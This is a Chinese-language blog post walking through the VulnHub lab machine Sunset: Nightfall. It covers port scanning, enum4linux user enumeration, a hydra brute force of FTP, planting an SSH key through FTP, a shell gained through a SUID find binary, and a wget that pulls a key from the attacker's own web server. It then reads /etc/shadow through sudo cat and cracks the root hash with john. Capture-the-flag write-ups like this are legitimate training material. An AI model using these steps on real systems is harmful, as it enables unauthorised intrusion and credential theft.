PJzhang:vulnhub靶机sunset系列SUNSET:NIGHTFALL

猫宁~~~

地址：https://www.vulnhub.com/entry/sunset-nightfall,355/

重视工具和思路。

nmap 192.168.43.0/24
靶机IP 192.168.43.14

nmap -A -p1-65535 192.168.43.14
21/tcp open ftp
22/tcp open ssh
80/tcp open http
139/tcp open netbios-ssn
445/tcp open microsoft-ds
3306/tcp open mysql

访问http://192.168.43.14/，显示apache2 debian页面

enum4linux 192.168.43.14
S-1-22-1-1000 Unix User\nightfall (Local User)
S-1-22-1-1001 Unix User\matt (Local User)

海外常见密码前10万
https://www.ncsc.gov.uk/static-assets/documents/PwnedPasswordsTop100k.txt

hydra -L /root/Desktop/user.txt -P /usr/share/wordlists/top1000.txt -f 192.168.43.14 ftp

账号密码matt/cheese
ftp://192.168.43.14/，登录，目录是/home/matt

攻击机上输入ssh-keygen
生成/root/.ssh/id_rsa.pub，/root/.ssh/id_rsa

cat id_rsa.pub > authorized_keys

ftp 192.168.43.14
mkdir .ssh
cd .ssh
put id_rsa.pub
put authorized_keys
put id_rsa

ssh matt@192.168.43.14，成功登录

查找suid权限的
find / -perm -u=s -type f 2>/dev/null
ls -al /scripts/find
cat /etc/passwd
发现nightfall用户
cd /home/nightfall
cat user.txt
97fb7140ca325ed96f67be3c9e30083d

获取nightfall权限
/scripts/find . -exec "/bin/sh" -p \;

sudo -l，失败

python3 -m http.server 8080

cd /home/nightfall
la -al
cd .ssh
wget http://192.168.43.154:8080/authorized_keys

ssh nightfall@192.168.43.14，获得nightfall权限

sudo -l
(root) NOPASSWD: /usr/bin/cat

sudo /usr/bin/cat /etc/shadow

复制root第二个字段，命名为mima.txt

john /root/Desktop/mima.txt，破解为miguel2

su root，输入密码就行

cat root_super_secret_flag.txt，家目录
flag{9a5b21fc6719fe33004d66b703d70a39}

posted @ 2020-09-08 22:16 PJzhang 阅读(269) 评论(0) 编辑收藏举报

会员力量，点亮园子希望

刷新页面返回顶部

PJzhang

南美的那只蝴蝶已经扇动了翅膀。

PJzhang:vulnhub靶机sunset系列SUNSET:NIGHTFALL

公告